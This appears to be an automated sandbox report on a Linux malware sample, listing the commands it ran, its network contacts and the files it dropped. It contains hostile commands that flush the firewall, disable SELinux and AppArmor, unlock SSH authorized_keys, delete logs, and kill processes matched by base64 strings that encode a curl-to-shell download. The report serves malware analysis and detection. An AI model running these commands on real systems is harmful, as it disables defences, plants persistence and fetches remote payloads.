/usr/bin/pgrep

[pgrep -f KHdnZXQgLXFPLSBodHRw]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f mwyumwdbpq.conf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f honvbsasbf.conf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f mqdsflm.cf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f lower.sh]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f ./ppp]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f cryptonight]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f ./seervceaess]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f ./servceaess]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f ./servceas]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f ./servcesa]

Network

Country Destination Domain Proto
US 1.1.1.1:53 en2an.top udp
NL 79.137.195.151:80 en2an.top tcp
US 1.1.1.1:53 en2an.top udp
NL 79.137.195.151:80 en2an.top tcp
US 1.1.1.1:53 en2an.top udp
NL 79.137.195.151:80 en2an.top tcp
US 1.1.1.1:53 en2an.top udp
NL 79.137.195.151:80 en2an.top tcp
NL 45.83.123.29:80 45.83.123.29 tcp

Files

/etc/zzhs

MD5 b026324c6904b2a9cb4b88d6d61c81d1
SHA1 e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e
SHA256 4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865
SHA512 3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686

/usr/bin/kswaped

MD5 26ab0db90d72e28ad0ba1e22ee510510
SHA1 7448d8798a4380162d4b56f9b452e2f6f9e24e7a
SHA256 53c234e5e8472b6ac51c1ae1cab3fe06fad053beb8ebfd8977b010655bfdd3c3
SHA512 63e22ec2fbeebabf005e58fbfb0eee607c4aa417045a68a0cc63767b048e3559268d35e72f367d3b2dbd5dbddf12fc4397762ba149260b3795a0391713bddcd7

/usr/bin/irqbalanced

MD5 6d7fce9fee471194aa8b5b6e47267f03
SHA1 a3db5c13ff90a36963278c6a39e4ee3c22e2a436
SHA256 1121cfccd5913f0a63fec40a6ffd44ea64f9dc135c66634ba001d10bcf4302a2
SHA512 2b59d179d9815994f687383a886ea34109889756efca5ab27318cc67ce2a21261d12fa6fee6b8c716f72214ead55ee0d789d6c35cff977d40ef5728ba9188a80

/usr/bin/rctlcli

MD5 48a24b70a0b376535542b996af517398
SHA1 9c6b057a2b9d96a4067a749ee3b3b0158d390cf1
SHA256 7de1555df0c2700329e815b93b32c571c3ea54dc967b89e81ab73b9972b72d1d
SHA512 db545c410fd0c8ede533d5b0666cd2798ba380bd25b655619cd5fd3a33a255569b3ccc319bfdef3322d8392d894d15c2e6aa2d53346e6ac54eaf5d627bfe6a9a

/usr/bin/systemd-network

MD5 1dcca23355272056f04fe8bf20edfce0
SHA1 5d9474c0309b7ca09a182d888f73b37a8fe1362c
SHA256 f0b5c2c2211c8d67ed15e75e656c7862d086e9245420892a7de62cd9ec582a06
SHA512 29b3573989378848e91465abb8bb12aaad1c40f01ddba6ce5dce4de88d61d49621cd4272bc6f889cd469e9490040b412eb0a237cf2cd49c637da1d5de5903f3d

/usr/bin/pamdicks

MD5 9ae0ea9e3c9c6e1b9b6252c8395efdc1
SHA1 ccf271b7830882da1791852baeca1737fcbe4b90
SHA256 06e9d52c1720fca412803e3b07c4b228ff113e303f4c7ab94665319d832bbfb7
SHA512 f3d08a4bfef201adbe711e8805f96ff13909719107dcac81f4fc9185040d59d8d573344a0707e697f8b4f0212e0d79f3bdd6b86688dd8c54019b9d93c937f3ca

/etc/zzhs

MD5 970d39f8690eff0fe573e7bcf51bda9b
SHA1 46f8f835d3d3d41f063d0e8346260bb622b01a3f
SHA256 7e3735835710cbbb54a0bee4a323c83c54cb1f4f60463b9cf88006946fe2b9a5
SHA512 24952be3e8e47ffb4ee83d55f513edf041f6c4e420e2f52bdbdf0daee4c5735ad3ee5ed863f95ffa931a70d551590a7fe6ae67dc22f32060793e2525e4b56cd0

/bin/ps

MD5 3d47b8e895a71930bda5d4f3d8fc8589
SHA1 efbaf468b81abb6b465ca12f35fa067bae1b4f10
SHA256 be167c52e59f0a02ca6841074d9e73205b2f7898ad73d405c7b96f9efb440c36
SHA512 bd109ac68d85a8451187e31b8ec62dbc062d3fa2aab866928b094b64318912c7056f42ca363b01af74b1898f84d2675f3099d1aab72140b6ba932a16257aa5eb

/bin/ps

MD5 f668da8f0525cbe5a545869cb5776913
SHA1 996e6afed4498ff8a92a64330de018141af102c9
SHA256 db7a08cba996d62b1fe07727ba58b98d7b59778bd7227c9b7fd69bc587d2557f
SHA512 f918ba58e9af19704344c92ec356d215080f47d66b175f3d712d31e54e1b9e4e46daeb0556d82b0722ae01b8cfe456f08021e73b053ced6326735e1d0b73c700

/bin/top

MD5 6956a4d6a2444151c11a73517215cb34
SHA1 b279ad496f640f44418aa7e5e27a4d458bddb7fb
SHA256 561941bdd6305a389e688a1214acd9163478301738158f13349ea403dfae300c
SHA512 ee1a27243159cf9aa99ed0ff79ae1f6d66c698f668e0c233544f1a79aab5bb8ca6edb051d907aef8b50ff85f39aa41b21e951476c3a53b6a85a7a06adc28ed8d

/bin/pstree

MD5 896f6d504f181bd883a90b84069bcf70
SHA1 86fd682d1932d9e14461796e5f0fe776b8ce9d5c
SHA256 b6eec955fd5b0e9ddf43ef55b7fe74075cc1a935ab896d5cd0a55429ef0d6d25
SHA512 1f705ceead76868a79abb7ea42efad35e37b95421bfc81ce4540e4beeb7cbc0ccadfaae85794b6945c93304da9948d9d63504f9377ca3e92b874cc3f691d3c1a

/etc/cron.d/zzh

MD5 3a615a3d1952b1e2c0cb584bd253f7f9
SHA1 79465a5e611f19f140f169ac5bc3a9ab382696ef
SHA256 ff1d557b85a902fbe4d2d0b0f3e79307f1f7e6dc36c537a824e920c5e8ece2de
SHA512 8819cd4ef33fe59b8618ac7a2f116169b2effeb87f2353b674ef08c8297dbbda75112c5dd882c60b05c9cedeab0aa3dd79e06923b2a2db0cad8a3ec2b6c5532e

/etc/crontab

MD5 b2ecca8d419b5c3fa2ee7621efa75eb7
SHA1 3adc58bd314dea94eebfd1582ffc8bbbb5cfb34e
SHA256 e15357c9d6df46a6b43036e8f646311f88019e587b8d55a8aecfa438cd971545
SHA512 c6a7d05b7f615de3946055be8a4995c0fb8c670fe53c8a8dcba98f32c2ec4cb92a93524aebaca97c9b6e8696b71bdc2114d6ec303bff4ec288745bae15522e69

/root/.ssh/authorized_keys

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

/root/.ssh/authorized_keys

MD5 12bf68ad9999dcbc8bd1d9a728d600aa
SHA1 7f302d2df5e075f879586cb0ab1dcc0b0870cc98
SHA256 cfc3a74939edac785d66664757b3c877a7e5f4fae29b3a5bdf8b55e79573dfb5
SHA512 ef6a8c50fd411622eefae30bfcc962368f355ec897b0136b2290784344ce735c3b3d51feda679e3c42ab524197d6515f1f8699e17598171a1b888b0fbe5229e7

/etc/zzh

MD5 c6d1e3293c17bddaaca25410de6c49fe
SHA1 82a412fcb51a87887e55c8798d111e2b5fd5b96d
SHA256 7dff9504960b180ba4328b80756d0849c690e64fc6879ede5094b6273fe2cd5a
SHA512 6134ca54020e037aca25c6d6e76ef29f73cc8e55058d90882dba38b72e586e73d94b84e4c167661a960b68eb679c408adcae60ca43fa4de9e095d7b2869b6584

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-30 01:04

Reported

2024-06-30 01:06

Platform

debian9-mipsel-20240418-en

Max time kernel

149s

Max time network

134s

Command Line

[/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown]

Signatures

Adds new SSH keys

persistence
Description Indicator Process Target
File opened for modification /root/.ssh/authorized_keys /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Executes dropped EXE

Description Indicator Process Target
N/A /etc/zzh N/A N/A
N/A /bin/ps N/A N/A
N/A /bin/ps N/A N/A

Flushes firewall rules

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /sbin/iptables N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Writes DNS configuration

Description Indicator Process Target
File opened for modification /etc/resolv.conf /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A

Creates/modifies Cron job

persistence
Description Indicator Process Target
File opened for modification /etc/cron.daily/logrotate /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /etc/cron.hourly/0anacron /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /etc/cron.d/zzh /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /etc/crontab /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Deletes log files

Description Indicator Process Target
File truncated /var/log/wtmp /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File truncated /var/log/secure /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Disables AppArmor

Description Indicator Process Target
N/A N/A /usr/local/bin/systemctl N/A
N/A N/A /bin/systemctl N/A
N/A N/A /usr/bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /bin/systemctl N/A
N/A N/A /bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/local/sbin/systemctl N/A
N/A N/A /bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /sbin/systemctl N/A
N/A N/A /bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/systemctl N/A
N/A N/A /sbin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/sbin/systemctl N/A
N/A N/A /usr/local/sbin/systemctl N/A
N/A N/A /usr/sbin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/local/bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables SELinux

Description Indicator Process Target
N/A N/A /usr/sbin/setenforce N/A
N/A N/A /usr/local/bin/kill N/A
N/A N/A /bin/grep N/A
N/A N/A /usr/local/sbin/kill N/A
N/A N/A /usr/bin/kill N/A
N/A N/A /usr/local/sbin/kill N/A
N/A N/A /usr/sbin/kill N/A
N/A N/A /sbin/kill N/A
N/A N/A /bin/kill N/A
N/A N/A /bin/grep N/A
N/A N/A /bin/grep N/A
N/A N/A /bin/grep N/A
N/A N/A /sbin/kill N/A
N/A N/A /usr/bin/kill N/A
N/A N/A /usr/local/bin/kill N/A
N/A N/A /usr/sbin/kill N/A
N/A N/A /bin/kill N/A

Enumerates running processes

Modifies rc script

persistence
Description Indicator Process Target
File opened for modification /etc/rc.d/rc.local /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Write file to user bin folder

Description Indicator Process Target
File opened for modification /usr/bin/systemd-network /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/pamdicks /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/ip6network /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/kswaped /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/irqbalanced /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/rctlcli /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /bin/pstree N/A N/A
File opened for modification /bin/ps /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /bin/ps N/A N/A
File opened for modification /bin/top /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /bin/top N/A N/A
File opened for modification /bin/pstree /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A
File opened for reading /sys/fs/kdbus/0-system/bus N/A N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/361/cmdline /bin/ps N/A
File opened for reading /proc/125/stat /bin/ps N/A
File opened for reading /proc/6/stat /bin/ps N/A
File opened for reading /proc/22/cmdline /bin/ps N/A
File opened for reading /proc/13/cmdline /bin/ps N/A
File opened for reading /proc/2/cmdline /bin/ps N/A
File opened for reading /proc/20/status N/A N/A
File opened for reading /proc/9/status /bin/ps N/A
File opened for reading /proc/75/status /bin/ps N/A
File opened for reading /proc/15/stat /bin/ps N/A
File opened for reading /proc/filesystems /bin/ps N/A
File opened for reading /proc/717/status N/A N/A
File opened for reading /proc/1437/stat /bin/ps N/A
File opened for reading /proc/75/stat /bin/ps N/A
File opened for reading /proc/110/stat /bin/ps N/A
File opened for reading /proc/75/cmdline N/A N/A
File opened for reading /proc/3/cmdline N/A N/A
File opened for reading /proc/22/status /bin/ps N/A
File opened for reading /proc/126/stat N/A N/A
File opened for reading /proc/717/status /bin/ps N/A
File opened for reading /proc/4/status /bin/ps N/A
File opened for reading /proc/13/cmdline N/A N/A
File opened for reading /proc/73/cmdline /bin/ps N/A
File opened for reading /proc/sys/kernel/osrelease /bin/ps N/A
File opened for reading /proc/110/status /bin/ps N/A
File opened for reading /proc/8/cmdline /bin/ps N/A
File opened for reading /proc/21/cmdline N/A N/A
File opened for reading /proc/387/status N/A N/A
File opened for reading /proc/381/cmdline /bin/ps N/A
File opened for reading /proc/71/status /bin/ps N/A
File opened for reading /proc/16/stat /bin/ps N/A
File opened for reading /proc/11/status N/A N/A
File opened for reading /proc/675/stat /bin/ps N/A
File opened for reading /proc/241/stat /bin/ps N/A
File opened for reading /proc/1591/stat /bin/ps N/A
File opened for reading /proc/71/cmdline /bin/ps N/A
File opened for reading /proc/110/status /usr/bin/pgrep N/A
File opened for reading /proc/15/cmdline N/A N/A
File opened for reading /proc/381/cmdline N/A N/A
File opened for reading /proc/710/cmdline /bin/ps N/A
File opened for reading /proc/5/status /bin/ps N/A
File opened for reading /proc/82/status /bin/ps N/A
File opened for reading /proc/715/cmdline N/A N/A
File opened for reading /proc/19/cmdline /bin/ps N/A
File opened for reading /proc/1385/status /bin/ps N/A
File opened for reading /proc/3/stat /bin/ps N/A
File opened for reading /proc/126/stat /bin/ps N/A
File opened for reading /proc/7/status N/A N/A
File opened for reading /proc/155/status /bin/ps N/A
File opened for reading /proc/155/status /bin/ps N/A
File opened for reading /proc/78/cmdline /bin/ps N/A
File opened for reading /proc/15/status /usr/bin/pgrep N/A
File opened for reading /proc/1785/status /usr/bin/pgrep N/A
File opened for reading /proc/387/cmdline N/A N/A
File opened for reading /proc/sys/kernel/osrelease N/A N/A
File opened for reading /proc/1109/cmdline /bin/ps N/A
File opened for reading /proc/5/status /bin/ps N/A
File opened for reading /proc/23/status /bin/ps N/A
File opened for reading /proc/20/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/940/status /bin/ps N/A
File opened for reading /proc/11/stat /bin/ps N/A
File opened for reading /proc/72/stat /bin/ps N/A
File opened for reading /proc/1426/stat /bin/ps N/A
File opened for reading /proc/3/status /bin/ps N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.aSO9uK N/A N/A
File opened for modification /tmp/svcguard /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /tmp/fileutl.message.njTAh6 N/A N/A
File opened for modification /tmp/fileutl.message.StRtBo N/A N/A
File opened for modification /tmp/fileutl.message.WGgpIW N/A N/A
File opened for modification /tmp/fileutl.message.qiAlfB N/A N/A
File opened for modification /tmp/fileutl.message.XpQCe5 N/A N/A
File opened for modification /tmp/fileutl.message.insSg6 N/A N/A
File opened for modification /tmp/.ice-unix/.../.watch N/A N/A
File opened for modification /tmp/fileutl.message.5Q6JlJ N/A N/A
File opened for modification /tmp/fileutl.message.w5uI3O N/A N/A
File opened for modification /tmp/svcupdate /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /tmp/kdevtmpfsi /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /tmp/fileutl.message.iSIlBG N/A N/A
File opened for modification /tmp/fileutl.message.v4Juk8 N/A N/A
File opened for modification /tmp/fileutl.message.umULWf N/A N/A
File opened for modification /tmp/dev/null /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Processes

/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown

[/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown]

/bin/chmod

[chmod 777 /usr/bin/chattr]

/bin/chmod

[chmod 777 /bin/chattr]

/usr/bin/chattr

[chattr -iua /tmp/]

/usr/bin/chattr

[chattr -iua /var/tmp/]

/sbin/iptables

[iptables -F]

/usr/bin/chattr

[chattr -iae /root/.ssh/]

/usr/bin/chattr

[chattr -iae /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -iua /tmp/]

/usr/bin/chattr

[chattr -iua /var/tmp/]

/bin/rm

[rm -rf /tmp/addres*]

/bin/rm

[rm -rf /tmp/walle*]

/bin/rm

[rm -rf /tmp/keys]

/bin/rm

[rm -rf /var/log/syslog]

/bin/sync

[sync]

/bin/cat

[cat /var/spool/cron/]

/bin/cat

[cat /root/.ssh/authorized_keys]

/bin/mv

[mv /usr/bin/wgettnt /usr/bin/wd1]

/bin/mv

[mv /usr/bin/curltnt /usr/bin/cd1]

/bin/mv

[mv /usr/bin/wget1 /usr/bin/wd1]

/bin/mv

[mv /usr/bin/curl1 /usr/bin/cd1]

/bin/mv

[mv /usr/bin/cur /usr/bin/cd1]

/bin/mv

[mv /usr/bin/cdl /usr/bin/cd1]

/bin/mv

[mv /usr/bin/cdt /usr/bin/cd1]

/bin/mv

[mv /usr/bin/xget /usr/bin/wd1]

/bin/mv

[mv /usr/bin/wge /usr/bin/wd1]

/bin/mv

[mv /usr/bin/wdl /usr/bin/wd1]

/bin/mv

[mv /usr/bin/wdt /usr/bin/wd1]

/bin/mv

[mv /usr/bin/wget /usr/bin/wd1]

/bin/mv

[mv /usr/bin/curl /usr/bin/cd1]

/bin/grep

[grep -i [a]liyun]

/bin/ps

[ps aux]

/bin/grep

[grep -i [y]unjing]

/bin/ps

[ps aux]

/usr/sbin/setenforce

[setenforce 0]

/usr/sbin/service

[service apparmor stop]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/usr/local/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/usr/local/bin/systemctl

